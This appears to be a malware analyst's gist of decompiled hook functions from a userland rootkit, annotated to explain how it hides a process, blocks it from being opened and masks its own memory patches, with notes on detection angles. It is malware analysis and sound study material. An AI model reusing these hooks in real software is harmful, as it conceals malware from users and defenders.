
@hasherezade
Last active December 7, 2016 03:26
Snippets from an MSIL userland rootkit
// Hook filter installed in place of NtReadVirtualMemory (Hex-Rays decompiler
// output: the loc_* symbols are decompiler labels for data inside the rootkit
// image, and offsets such as "&loc_7 + 4 * i + 5" are its artefacts, kept
// verbatim because the underlying layout is not visible here).
// Visible behaviour: the real syscall always runs first; only when it
// succeeded AND the target handle refers to the calling process itself does
// the hook rewrite parts of the caller's output buffer (up to three 0x18-byte
// ranges). Reads issued against a different process are returned untouched,
// so a scan of this process's memory performed from outside it does not pass
// through this rewrite — the pid check below is the relevant detection angle.
// NOTE(analysis): the three rewritten ranges are presumably the locations the
// rootkit itself patched (original bytes substituted so a self-check of code
// integrity sees clean memory); the snippet alone cannot prove that.
int __stdcall NtReadVirtualMemory_filter(int ProcessHandle, unsigned int BaseAddress, int Buffer, int NumberOfBytesToRead, int NumberOfBytesRead)
{
int pid; // esi@2
int v7; // [sp-14h] [bp-2Ch]@1
int v8; // [sp-10h] [bp-28h]@1
int v9; // [sp-Ch] [bp-24h]@1
int v10; // [sp-8h] [bp-20h]@1
int v11; // [sp-4h] [bp-1Ch]@1
int v12; // [sp+0h] [bp-18h]@0
int v13; // [sp+4h] [bp-14h]@0
unsigned int j; // [sp+4h] [bp-14h]@9
int v15; // [sp+8h] [bp-10h]@0
int v16; // [sp+8h] [bp-10h]@9
int v17; // [sp+Ch] [bp-Ch]@0
unsigned int i; // [sp+Ch] [bp-Ch]@4
int res; // [sp+10h] [bp-8h]@1
// (v7..v13, v15 and v17 are never referenced below: leftover stack slots
// emitted by the decompiler, not program state.)
// Pass-through to the saved original entry point. The cast is spelled __cdecl
// here although the other hooks use __stdcall; likely a decompiler artefact.
res = ((int (__cdecl *)(int, unsigned int, int, int, int))((char *)&NtReadVirtualMemory_original))(
ProcessHandle,
BaseAddress,
Buffer,
NumberOfBytesToRead,
NumberOfBytesRead);
if ( res >= 0 ) // NTSTATUS success (NT_SUCCESS is "status >= 0")
{
pid = GetProcessId(ProcessHandle);
// Only reads of the calling process's own memory are tampered with;
// -1 is the current-process pseudo-handle (what GetCurrentProcess() returns).
if ( pid == GetCurrentProcessId() || ProcessHandle == -1 )
{
// Three-entry table of DWORD addresses, 4 bytes apart, starting at &loc_7+5.
for ( i = 0; i < 3; ++i )
{
// Entry is populated and its start lies inside
// [BaseAddress, BaseAddress + NumberOfBytesToRead). Only the start address
// is range-checked: nothing bounds the 0x18-byte write below against the
// end of the requested range.
if ( *(_DWORD *)((char *)&loc_7 + 4 * i + 5)
&& *(_DWORD *)((char *)&loc_7 + 4 * i + 5) >= BaseAddress
&& *(_DWORD *)((char *)&loc_7 + 4 * i + 5) < NumberOfBytesToRead + BaseAddress )
{
v16 = *(_DWORD *)((char *)&loc_7 + 4 * i + 5) - BaseAddress; // offset of that address within the caller's buffer
// Overwrite 0x18 (24) bytes of the returned data with the i-th 24-byte
// record of a second table at &loc_2B-19 (24-byte stride).
for ( j = 0; j < 0x18; ++j )
*(_BYTE *)(Buffer + v16 + j) = *((_BYTE *)&loc_2B + 24 * i + j - 19);
}
}
}
}
return res; // the original status is returned unchanged
}
// Hook filter installed in place of NtOpenProcess: refuses to open one
// protected process and forwards everything else to the saved original.
// ClientId points at a CLIENT_ID whose first member is UniqueProcess, so
// *ClientId is the pid being opened; it is compared against the pid stored at
// &malwareId+3 (decompiler label; the +3 is a decompiler artefact).
// Only the ClientId path is filtered: the check is skipped when ClientId is
// NULL, and nothing else in the request (handle, access mask, attributes) is
// inspected. The pointer symbol is spelled NOpentProcess_original as in the
// decompiler output; it is a symbol name, so it is left untouched.
int __stdcall NtOpenProcess_filter(int ProcessHandle, int DesiredAccess, int ObjectAttributes, _DWORD *ClientId)
{
int res; //result of the operation
if ( ClientId && *ClientId == *(_DWORD *)((char *)&malwareId + 3) )
res = 0xC0000022; //STATUS_ACCESS_DENIED (stored in an int, i.e. a negative/failed NTSTATUS)
else
res = ((int (__stdcall *)(int, int, int, _DWORD *))((char *)&NOpentProcess_original))(
ProcessHandle,
DesiredAccess,
ObjectAttributes,
ClientId);
return res;
}
// Hook filter installed in place of NtQuerySystemInformation. The real call
// completes first; on success the returned buffer is edited for two
// information classes so that one process — its id held in loc_8 (decompiler
// label) — no longer appears in the result. ReturnLength is never adjusted.
// Expressions of the form "&loc_XX + (_DWORD)&SystemInformation[4 * i] - N"
// are Hex-Rays artefacts for "record i, field at offset (loc_XX - N)"; the
// real field offsets are not recoverable from this snippet, so the field
// identities noted below are hedged.
int __stdcall NtQuerySystemInformation_filter(int SystemInformationClass, unsigned int *SystemInformation, int SystemInformationLength, int ReturnLength)
{
char *v4; // esi@18  source record (j+1) while shifting the handle table
char *v5; // edi@18  destination record (j)
unsigned int j; // [sp+8h] [bp-1Ch]@16
unsigned int i; // [sp+Ch] [bp-18h]@13
int res; // [sp+10h] [bp-14h]@1
unsigned int *sys_info_ptr; // [sp+18h] [bp-Ch]@3  record under examination
unsigned int *v11; // [sp+1Ch] [bp-8h]@5  record preceding sys_info_ptr
res = ((int (__stdcall *)(int, unsigned int *, int, int))NtQuerySystemInformation_original)(
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength);
if ( res >= 0 ) // NTSTATUS success
{
if ( SystemInformationClass == 5 ) //SystemProcessInformation
{
// SYSTEM_PROCESS_INFORMATION records are chained by NextEntryOffset, the
// first ULONG of each record (0 marks the last one). v11 trails one record
// behind sys_info_ptr so a matching record can be unlinked. The very first
// record is never compared — only successors of an existing record are.
sys_info_ptr = SystemInformation;
while ( *sys_info_ptr )
{
v11 = sys_info_ptr;
sys_info_ptr = (unsigned int *)((char *)sys_info_ptr + *sys_info_ptr);
// NOTE(analysis): presumably this record's UniqueProcessId compared with
// the hidden pid (loc_8); the field offset (loc_56 - 18) cannot be confirmed here.
if ( *(unsigned int *)((char *)sys_info_ptr + (_DWORD)&loc_56 - 18) == loc_8 )
{
// Unlink: make the previous record skip over this one, or terminate the
// chain if this one was last. The record's bytes stay in the buffer — only
// the link changes — so the raw buffer still contains the hidden entry.
if ( *sys_info_ptr )
*v11 += *sys_info_ptr;
else
*v11 = 0;
sys_info_ptr = v11; // re-examine from the previous record (handles back-to-back matches)
}
}
}
else if ( SystemInformationClass == 16 ) //SystemHandleInformation
{
// SYSTEM_HANDLE_INFORMATION: *SystemInformation is NumberOfHandles, followed
// by 16-byte SYSTEM_HANDLE_TABLE_ENTRY_INFO records; SystemInformation[4 * i]
// (four ULONGs per record) addresses record i.
for ( i = 0; i < *SystemInformation; ++i )
{
// NOTE(analysis): presumably the owning-process field of record i compared
// with the hidden pid (loc_8); the exact field is not recoverable here.
if ( *(_DWORD *)((char *)&loc_15 + (_DWORD)&SystemInformation[4 * i] - 17) == loc_8 )
{
// Clear six fields of the matched record. Redundant in effect: the shift
// below always runs at least once and overwrites record i with record i+1.
*((_BYTE *)&loc_1D + (_DWORD)&SystemInformation[4 * i] - 20) = 0;
*(_DWORD *)((char *)&loc_23 + (_DWORD)&SystemInformation[4 * i] - 19) = 0;
*(_WORD *)((char *)&loc_1D + (_DWORD)&SystemInformation[4 * i] - 19) = 0;
*(_DWORD *)((char *)&loc_20 + (_DWORD)&SystemInformation[4 * i] - 20) = 0;
*((_BYTE *)&loc_1A + (_DWORD)&SystemInformation[4 * i] - 18) = 0;
*(_DWORD *)((char *)&loc_15 + (_DWORD)&SystemInformation[4 * i] - 17) = 0;
// Shift every later record down one slot: 16 bytes (four DWORDs) from
// record j+1 into record j. On the last iteration (j == count-1) the source
// is record "count", one past the last reported entry — whether that lies
// inside the caller's buffer depends on SystemInformationLength, which is
// not checked here.
for ( j = i; j < *SystemInformation; ++j )
{
v4 = (char *)&loc_15 + (_DWORD)&SystemInformation[4 * (j + 1)] - 17;
v5 = (char *)&loc_15 + (_DWORD)&SystemInformation[4 * j] - 17;
*(_DWORD *)v5 = *(_DWORD *)v4;
v4 += 4;
v5 += 4;
*(_DWORD *)v5 = *(_DWORD *)v4;
v4 += 4;
v5 += 4;
*(_DWORD *)v5 = *(_DWORD *)v4;
*((_DWORD *)v5 + 1) = *((_DWORD *)v4 + 1);
}
--*SystemInformation; // one fewer handle reported (buffer length and ReturnLength unchanged)
--i; // re-check slot i, which now holds the former record i+1 (unsigned: wraps at 0 and ++i restores it)
}
}
}
}
return res;
}